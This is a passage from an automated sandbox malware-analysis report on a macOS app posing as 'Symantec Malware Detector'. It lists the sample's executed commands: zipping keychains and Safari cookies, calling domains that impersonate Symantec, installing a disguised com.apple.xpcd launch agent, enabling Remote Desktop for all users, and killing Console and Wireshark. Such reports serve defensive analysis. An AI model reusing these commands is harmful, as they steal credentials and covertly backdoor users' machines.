Source: /usr/bin/perl5.18 (PID: 580)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_gamecontrollerd' uid
Source: /usr/bin/perl5.18 (PID: 581)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_geod' uid
Source: /usr/bin/perl5.18 (PID: 582)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_iconservices' uid
Source: /usr/bin/perl5.18 (PID: 583)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installassistant' uid
Source: /usr/bin/perl5.18 (PID: 584)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installer' uid
Source: /usr/bin/perl5.18 (PID: 585)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_jabber' uid
Source: /usr/bin/perl5.18 (PID: 586)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_admin' uid
Source: /usr/bin/perl5.18 (PID: 587)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_changepw' uid
Source: /usr/bin/perl5.18 (PID: 588)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_anonymous' uid
Source: /usr/bin/perl5.18 (PID: 589)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_changepw' uid
Source: /usr/bin/perl5.18 (PID: 590)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kadmin' uid
Source: /usr/bin/perl5.18 (PID: 591)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kerberos' uid
Source: /usr/bin/perl5.18 (PID: 592)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_krbtgt' uid
Source: /usr/bin/perl5.18 (PID: 593)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbfast' uid
Executes the "chmod" command used to modify permissionsShow sources
Source: /usr/bin/sudo (PID: 540)Chmod executable: /bin/chmod -> chmod -R 777 /Library/.cachedir /Library/.random
Source: /usr/bin/sudo (PID: 548)Chmod executable: /bin/chmod -> chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Executes the "curl" command used to transfer data via the network (usually using HTTP/S)Show sources
Source: /bin/sh (PID: 513)Curl executable: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 516)Curl executable: /usr/bin/curl -> curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa
Executes the "dscl" in order to retrieve a list of existing users and/or other user informationShow sources
Source: /bin/sh (PID: 553)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
Source: /bin/sh (PID: 554)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
Source: /bin/sh (PID: 555)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
Source: /bin/sh (PID: 556)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
Source: /bin/sh (PID: 557)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
Source: /bin/sh (PID: 558)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
Source: /bin/sh (PID: 559)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
Source: /bin/sh (PID: 560)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
Source: /bin/sh (PID: 561)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
Source: /bin/sh (PID: 562)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
Source: /bin/sh (PID: 563)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
Source: /bin/sh (PID: 564)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
Source: /bin/sh (PID: 565)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
Source: /bin/sh (PID: 566)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
Source: /bin/sh (PID: 567)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 569)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 570)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 571)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 572)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 573)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 574)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 575)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 576)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 577)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 578)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 579)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 580)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 581)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 582)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 583)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 584)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 585)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 586)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 587)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 588)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 589)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 590)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 591)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 592)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 593)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/sh (PID: 481)Mkdir executable: /bin/mkdir -> mkdir /tmp/.dio3we
Source: /usr/bin/sudo (PID: 538)Mkdir executable: /bin/mkdir -> mkdir -p /Library/.cachedir /Library/.random
Executes the "ping" command used for connectivity testing via ICMPShow sources
Source: /bin/sh (PID: 518)Ping executable: /sbin/ping -> ping -c 1 symantecheurengine.com
Source: /bin/sh (PID: 520)Ping executable: /sbin/ping -> ping -c 1 symheureng.com
Source: /bin/sh (PID: 522)Ping executable: /sbin/ping -> ping -c 1 symeher.co
Source: /bin/sh (PID: 524)Ping executable: /sbin/ping -> ping -c 1 kio2349329490jfdkf394.com
Source: /bin/sh (PID: 526)Ping executable: /sbin/ping -> ping -c 1 klsadkla93242lokiloki.com
Source: /bin/sh (PID: 528)Ping executable: /sbin/ping -> ping -c 1 abrahamlincolnisaliveandrunssymantec.com
Executes the "route" command used read or manipulate the routing tablesShow sources
Source: /bin/sh (PID: 479)Route executable: /sbin/route -> route -n get default
Opens applications that may be created onesShow sources
Source: /bin/sh (PID: 504)Application opened: open /tmp/xpc.app
Reads launchservices plist filesShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads user launchservices plist file containing default apps for corresponding filetypesShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/unzip (PID: 502)File written: /private/tmp/xpc.app/Contents/MacOS/xpc
Source: /bin/cp (PID: 541)File written: /Library/.random/xpcd.app/Contents/MacOS/xpc
Writes Mach-O files to the tmp directoryShow sources
Source: /usr/bin/unzip (PID: 502)64-bit Mach-O written to tmp path: /private/tmp/xpc.app/Contents/MacOS/xpc
Writes Python files to diskShow sources
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/cb.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/ch.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/pbkdf2.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/pyDes.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/Schema.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/cb.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/ch.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/pbkdf2.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/pyDes.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/Schema.py
Writes ZIP files to diskShow sources
Source: /usr/bin/zip (PID: 485)ZIP file created: /private/tmp/.dio3we/ziRJb6aY
Source: /usr/bin/zip (PID: 487)ZIP file created: /private/tmp/.dio3we/ziPHlHPH
Writes icon files to diskShow sources
Source: /usr/bin/unzip (PID: 502)File written: /private/tmp/xpc.app/Contents/Resources/Finder.icns
Source: /bin/cp (PID: 541)File written: /Library/.random/xpcd.app/Contents/Resources/Finder.icns
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/sh (PID: 483)Rm executable: /bin/rm -> rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /usr/bin/xargs (PID: 492)Rm executable: /bin/rm -> rm -- /tmp/.dio3we/KEYCHAINS.zip /tmp/.dio3we/SAFARI.zip
Source: /bin/sh (PID: 531)Rm executable: /bin/rm -> rm -rf /tmp/.sklerfde
Source: /bin/sh (PID: 535)Rm executable: /bin/rm -> rm -rf grace_period
Executes the "sudo" command used to execute a command as another userShow sources
Source: /bin/sh (PID: 495)Sudo executable: /usr/bin/sudo -> sudo -k
Source: /bin/sh (PID: 498)Sudo executable: /usr/bin/sudo -> sudo -S echo success
Source: /bin/sh (PID: 537)Sudo executable: /usr/bin/sudo -> sudo -S mkdir -p /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 539)Sudo executable: /usr/bin/sudo -> sudo chmod -R 777 /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 543)Sudo executable: /usr/bin/sudo -> sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>
Source: /bin/sh (PID: 545)Sudo executable: /usr/bin/sudo -> sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 547)Sudo executable: /usr/bin/sudo -> sudo chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 550)Sudo executable: /usr/bin/sudo -> sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Many shell processes execute programs via execve syscall (may be indicative for malicious behaviour)Show sources
Source: /bin/sh (PID: 479)Shell process: route -n get default
Source: /bin/sh (PID: 480)Shell process: awk /gateway/ { print $2 }
Source: /bin/sh (PID: 481)Shell process: mkdir /tmp/.dio3we
Source: /bin/sh (PID: 482)Shell process: cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /bin/sh (PID: 483)Shell process: rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /bin/sh (PID: 485)Shell process: zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Source: /bin/sh (PID: 487)Shell process: zip -qr /tmp/.dio3we/KEYCHAINS.zip /Users/vreni/Library/Keychains /Library/Keychains
Source: /bin/sh (PID: 490)Shell process: find /tmp/.dio3we -type f -not -name backup_(null).zip -print0
Source: /bin/sh (PID: 491)Shell process: xargs -0 rm --
Source: /bin/sh (PID: 493)Shell process: screencapture -x /tmp/.dio3we/.prelim.png
Source: /bin/sh (PID: 494)Shell process: csrutil status
Source: /bin/sh (PID: 495)Shell process: sudo -k
Source: /bin/sh (PID: 498)Shell process: sudo -S echo success
Source: /bin/sh (PID: 502)Shell process: unzip -d /tmp /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/Resources/sym03_2901.dat
Source: /bin/sh (PID: 503)Shell process: xattr -c /tmp/xpc.app
Source: /bin/sh (PID: 504)Shell process: open /tmp/xpc.app
Source: /bin/sh (PID: 507)Shell process: openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 510)Shell process: nc -G 20 -z 8.8.8.8 53
Source: /bin/sh (PID: 513)Shell process: curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 516)Shell process: curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa
Source: /bin/sh (PID: 518)Shell process: ping -c 1 symantecheurengine.com
Source: /bin/sh (PID: 520)Shell process: ping -c 1 symheureng.com
Source: /bin/sh (PID: 522)Shell process: ping -c 1 symeher.co
Source: /bin/sh (PID: 524)Shell process: ping -c 1 kio2349329490jfdkf394.com
Source: /bin/sh (PID: 526)Shell process: ping -c 1 klsadkla93242lokiloki.com
Source: /bin/sh (PID: 528)Shell process: ping -c 1 abrahamlincolnisaliveandrunssymantec.com
Source: /bin/sh (PID: 530)Shell process: cat /tmp/.sklerfde
Source: /bin/sh (PID: 531)Shell process: rm -rf /tmp/.sklerfde
Source: /bin/sh (PID: 533)Shell process: killall Console
Source: /bin/sh (PID: 534)Shell process: killall Wireshark
Source: /bin/sh (PID: 535)Shell process: rm -rf grace_period
Source: /bin/sh (PID: 537)Shell process: sudo -S mkdir -p /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 539)Shell process: sudo chmod -R 777 /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 541)Shell process: cp -R /tmp/xpc.app /Library/.random/xpcd.app
Source: /bin/sh (PID: 542)Shell process: mv /Library/.random/xpcd.app/Contents/MacOS/xpc /Library/.random/xpcd.app/Contents/MacOS/xpcd
Source: /bin/sh (PID: 543)Shell process: sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string>
Source: /bin/sh (PID: 545)Shell process: sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 547)Shell process: sudo chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 550)Shell process: sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Source: /bin/sh (PID: 553)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
Source: /bin/sh (PID: 554)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
Source: /bin/sh (PID: 555)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
Source: /bin/sh (PID: 556)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
Source: /bin/sh (PID: 557)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
Source: /bin/sh (PID: 558)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
Source: /bin/sh (PID: 559)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
Source: /bin/sh (PID: 560)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
Source: /bin/sh (PID: 561)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
Source: /bin/sh (PID: 562)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
Source: /bin/sh (PID: 563)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
Source: /bin/sh (PID: 564)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
Source: /bin/sh (PID: 565)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
Source: /bin/sh (PID: 566)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
Source: /bin/sh (PID: 567)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 569)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 570)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 571)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 572)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 573)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 574)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 575)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 576)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 577)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 578)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 579)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 580)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 581)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 582)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 583)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 584)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 585)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 586)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 587)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 588)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 589)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 590)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 591)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 592)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 593)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid
Reads local browser cookiesShow sources
Source: /usr/bin/zip (PID: 485)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Source: /usr/bin/zip (PID: 485)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Terminates several processes with shell command 'killall'Show sources
Source: /bin/sh (PID: 533)Killall command executed: killall Console
Source: /bin/sh (PID: 534)Killall command executed: killall Wireshark

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /bin/sh (PID: 546)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Library/LaunchAgents/com.apple.xpcd.plist
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /bin/sh (PID: 546)Launch agent created file created: /Library/LaunchAgents/com.apple.xpcd.plist

Hooking and other Techniques for Hiding and Protection:

barindex
Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentionsShow sources
Source: /bin/sh (PID: 546)Launch agent created file created: /Library/LaunchAgents/com.apple.xpcd.plist
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)Show sources
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)PTRACE system call (PT_DENY_ATTACH): PID 505 denies future traces
Explicitly terminates console (used for log message viewing) processesShow sources
Source: /bin/sh (PID: 533)Kills 'Console' processes: killall Console
Explicitly terminates network capturing processesShow sources
